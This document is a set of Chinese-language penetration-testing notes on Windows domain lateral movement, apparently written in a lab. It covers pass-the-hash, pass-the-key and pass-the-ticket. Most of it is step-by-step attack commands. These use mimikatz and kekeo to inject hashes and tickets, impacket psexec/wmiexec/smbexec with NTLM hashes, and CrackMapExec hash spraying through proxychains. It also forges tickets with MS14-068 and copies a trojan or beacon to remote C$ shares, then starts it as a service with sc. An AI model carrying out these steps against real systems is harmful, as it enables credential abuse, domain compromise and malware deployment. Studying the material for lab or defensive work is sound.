内网安全-横向移动-pth&ptk&ptt

基于凭证

• pth（pass the hash）

  • 原理

    • PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码（impaket的各种协议）

    • 如果禁用了ntlm认证，PsExec无法利用获得的ntlm hash进行远程连接，但是使用mimikatz还是可以攻击成功。（mimikatz）

  • mimikatz的hash传递攻击

    • 先提权

    • mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.21 /ntlm:ccef208c6485269c20db2cad21734fe7（这条语句输入完 会在被控主机30的电脑界面弹出一个shell）

    • 下面的操作都是在该shell下执行的

    • net use \\192.168.3.21\c$ （尝试与21主机建立c盘文件的共享连接）

    • copy cws.exe \\192.168.3.21\c$(把30主机的木马复制到21主机)

    • sc \\192.168.3.21 create bshell binpath= "c:\tool\cws.exe"（创建服务 路径为木马的路径）（在21主机的计算机管理-服务和应用程序-服务-bshell查看是否创建）

    • sc \\192.168.3.21 start bshell （启动服务 也就是启动木马-会成功上线）

      • 不知道为啥启动服务失败

  • impacket-at&ps&wmi&smb

    • atexec

    • psexec

      • psexec -hashes :NTLM值 域名/域用户@域内ip地址

    • wmi

      • wmiexec -hashes :NTLM值 域名/域用户@域内ip地址

    • smb

      • smbexec -hashes :NTLM值 域名/域用户@域内ip地址

    • 这些协议也有对应的py版本 可以配置代理去本机执行

      • 具体看上面的基于协议的笔记

  • Proxychains&CrackMapExec 代理+密码喷射

    • 建立socks连接，设置socks代理，配置规则，调用

    • 代理配置：Proxychains.conf

    • 密码喷射-域用户登录PTH：

      • 域用户hash登录

        • proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c

      • 本地用户hash登录

        • proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth

• ptk

  • 原理及利用条件

    • 对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash来实现ptk攻击

      • pth：没打补丁用户都可以连接，打了补丁只能administrator连接

      • ptk：打了补丁才能用户都可以连接，采用aes256连接

      • 当系统安装了KB2871997补丁且禁用了NTLM的时候， 那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式获得权限

    • 鸡肋：因为只有禁用了NTLM才能利用 而且还要打了补丁

  • mimikatz sekurlsa::ekeys （获取aes256值）

  • mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

• ptt

  • 漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证

    • 原理

      • MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。 它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。 该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。 用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

      • 伪造域管TGT 利用该漏洞 伪造用户身份tgt票据（类似web的cookie伪造） 条件：取得一个域内用户权限即可

    • 获取SID值：shell whoami/user

    • 根据sid值生成票据文件：shell ms14-068.exe -u fileadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p Admin12345

      • （查看票据：shell klist）

      • （清除票据连接：shell klist purge）

      • -p 是指fileadmin的密码

    • 内存导入票据：mimikatz kerberos::ptc TGT_fileadmin@god.org.ccache

    • 连接目标上线：shell dir \\OWA2010CN-GOD\c$

      • shell net use \\OWA2010CN-GOD\C$

      • copy beacon.exe \\OWA2010CN-GOD\C$

      • sc \\OWA2010CN-GOD create bindshell binpath= "c:\ncws.exe"

      • sc \\OWA2010CN-GOD start bindshell

    • 注意：成功不成功看DC域控漏洞补丁打没打

  • kekeo(高权限，需NTLM)-利用获取的NTLM生成新的票据尝试认证

    • 原理及条件

      • 因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据， 我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗

      • 缺点：票据是有有效期的，所以如果当前主机在连接过域控的话，有效期内可利用。

      • 注意：成功不成功看ntlm哈希值的正确性

    • 利用

      • 生成票据（可以理解为请求票据把他生成到桌面）：shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"

      • 导入票据：shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"

      • 查看票据：shell klist

      • 利用票据连接：shell dir \\owa2010cn-god\c$

  • mimikatz(高权限,需Ticket)-利用历史遗留的票据重新认证尝试

    • 注意需要高权限（mimikatz需要高权限 ）并且需要该主机有被想要连接的主机所登录过

    • 导出票据： mimikatz sekurlsa::tickets /export

    • 导入票据： mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi

      • [0;2ba64c]-2-0-40e00000-Administrator@krbtgt-god.org.kirbi （这个文件会生成在桌面上 自己根据生成的名字去输入）

    • 查看票据：shell klist

    • 利用票据连接：shell dir \\owa2010cn-god\c$